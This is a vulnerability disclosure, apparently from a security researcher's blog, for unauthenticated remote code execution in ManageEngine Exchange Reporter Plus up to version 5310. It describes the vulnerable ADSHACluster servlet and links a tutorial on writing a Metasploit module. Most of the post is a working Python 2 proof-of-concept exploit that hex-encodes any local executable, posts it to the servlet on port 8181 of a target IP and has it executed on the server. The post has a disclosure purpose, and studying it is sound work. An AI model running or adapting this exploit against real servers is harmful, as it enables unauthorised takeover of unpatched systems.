28-06-2018 / Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

Introduction

How to create a Metasploit module, using this vulnerability as the example? YouTube video

[PL] How to create a #Metasploit module? Tutorial on YouTube

The Java servlet ADSHACluster takes two parameters: BCP_RLL and BCP_EXE.

The received data is decoded from hex encoding and saved inside the bin directory.

That is how the bcp.rll and bcp.exe files are created.

Then the exe file is executed using exec("cmd /c bcp.exe -?").

POC

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

Metasploit module

# Python 2 proof of concept (urllib.urlopen, print statements and builtin reduce are Python 2).
import urllib
file_to_execute = "calc.exe"
ip = "192.168.1.105"

def to_hex(s):
    # Hex-encode every byte as two lowercase digits; the servlet decodes this before writing.
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)
    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

# BCP_RLL and BCP_EXE are written to the bin directory as bcp.rll and bcp.exe.
params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
# The servlet reports an error after running "cmd /c bcp.exe -?", so the error status means the file was executed.
if '{"STATUS":"error"}' in f.read():
    print "OK"
else:
    print "ERROR"

Timeline

  • 28-06-2018: Version 5311 released
  • 28-06-2018: Release